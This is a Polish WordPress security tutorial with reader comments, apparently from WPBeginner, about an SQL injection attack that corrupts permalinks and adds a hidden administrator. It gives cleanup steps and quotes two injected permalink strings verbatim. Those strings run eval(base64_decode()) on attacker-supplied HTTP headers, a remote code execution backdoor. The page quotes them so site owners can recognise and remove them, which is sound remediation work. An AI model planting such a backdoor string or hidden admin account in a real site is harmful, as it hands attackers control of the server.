Zaufane samouczki WordPress, kiedy ich najbardziej potrzebujesz.
Przewodnik dla początkujących po WordPressie
WPB Cup
25 milionów+
Witryny korzystające z naszych wtyczek
16+
Lata doświadczenia z WordPressem
3000+
Samouczki WordPress od ekspertów

Wstrzyknięcie SQL w WordPress – najnowszy atak

Wiele witryn jest atakowanych przez niedawny atak SQL, w którym do witryny wstrzykiwane są kody. To wstrzyknięcie MySQL wpływa na Twoje permalinki, czyniąc je nieskutecznymi. W rezultacie adresy URL Twoich wpisów na blogu nie będą działać. Liczne blogi WordPress były celem tego ataku. Dzięki Andy Soward za zwrócenie na to naszej uwagi.

W strukturze permalinków dodano jeden z poniższych kodów z powodu tego ataku:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Te cytaty dodały wszystkie permalinki do Twojej witryny i można je zmienić tylko poprzez ręczne usunięcie.

Aby to naprawić, przejdź do:

Ustawienia > Permalinks i usuń powyższy kod, a następnie zastąp swój domyślny kod.

Następną rzeczą, którą musisz zrobić, jest przejście do Użytkowników. Zobaczysz, że jest więcej niż jeden administrator. Nie zobaczysz ich nazw, ale zobaczysz zwiększoną liczbę. Musisz więc przejrzeć wszystkich użytkowników i znaleźć ostatniego, który się zarejestrował. Najedź kursorem na tego użytkownika i uzyskaj link. Zmień kod userid= dodając 1 do tej liczby. Jeśli więc ostatnim użytkownikiem, którego widzisz, był użytkownik nr 2, dodaj do niego 1 i zrób 3. Powinieneś znaleźć ukrytego administratora z dziwnym kodem jako imieniem. Usuń kod i zmień jego rolę na subskrybenta. Następnie wróć i usuń go.

To powinno rozwiązać problem. Możesz go również usunąć, po prostu przechodząc do swojego PHPMyAdmin. Ponieważ zobaczysz tam użytkownika.

Chcieliśmy po prostu jak najszybciej przekazać tę wiadomość, aby nasi użytkownicy mogli zostać zaktualizowani. Upewnij się, że Twój blog nie jest zainfekowany. Mamy nadzieję, że WordPress wkrótce wyda nową wersję.

Również, jeśli nie wdrożyłeś niektórych z tych środków w celu zabezpieczenia swojego Obszaru Administracyjnego WordPress.

Ujawnienie: Nasze treści są wspierane przez czytelników. Oznacza to, że jeśli klikniesz w niektóre z naszych linków, możemy otrzymać prowizję. Zobacz jak finansowany jest WPBeginner, dlaczego to ważne i jak możesz nas wesprzeć. Oto nasz proces redakcyjny.

Ostateczny zestaw narzędzi WordPress

Uzyskaj BEZPŁATNY dostęp do naszego zestawu narzędzi – kolekcji produktów i zasobów związanych z WordPress, które powinien mieć każdy profesjonalista!

Interakcje czytelników

8 CommentsLeave a Reply

  1. Baza danych mojej strony internetowej została zainfekowana kilka dni temu, dodając dziwne znaki i słowa po adresie URL każdego posta lub strony. Nie mogłem znaleźć nic dziwnego w ustawieniach: permalinkach ani w menu użytkowników. Co mam zrobić, aby rozwiązać ten problem? Moja firma hostingowa ma również kopię zapasową zainfekowanej bazy danych!

  2. Dwa razy mnie to trafiło.

    za pierwszym razem był to plugin wassup sql injection, tym razem nie jestem pewien. mój dostawca hostingu mnie zablokował.

    gdy tylko przywrócą moje konto, usunę WordPressa... Mam tego dość!

    • Co udało Ci się ustalić w tej sprawie? Właśnie spotkałem się z tym samym problemem. Wszystkie moje strony WP na moim koncie cierpią z powodu tego samego problemu.

    • Naprawdę doceniamy ten komentarz, problem nie leżał po stronie WP Super Cache, wierzymy, że był to wtyczka o nazwie WP External Link. Odinstalowaliśmy i ponownie zainstalowaliśmy WP-Super Cache dwukrotnie, a następnie porównaliśmy serwer deweloperski, na którym wszystko działało poprawnie. Różnicą była ta wtyczka. Kiedy usunęliśmy tę wtyczkę, zadziałało. Możesz teraz przeczytać ten post.

      Admin

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Och, czytam!
        Dzięki wielkie!

Zostaw odpowiedź

Dziękujemy za pozostawienie komentarza. Pamiętaj, że wszystkie komentarze są moderowane zgodnie z naszą polityką komentowania, a Twój adres e-mail NIE zostanie opublikowany. Prosimy NIE używać słów kluczowych w polu nazwy. Prowadźmy osobistą i znaczącą rozmowę.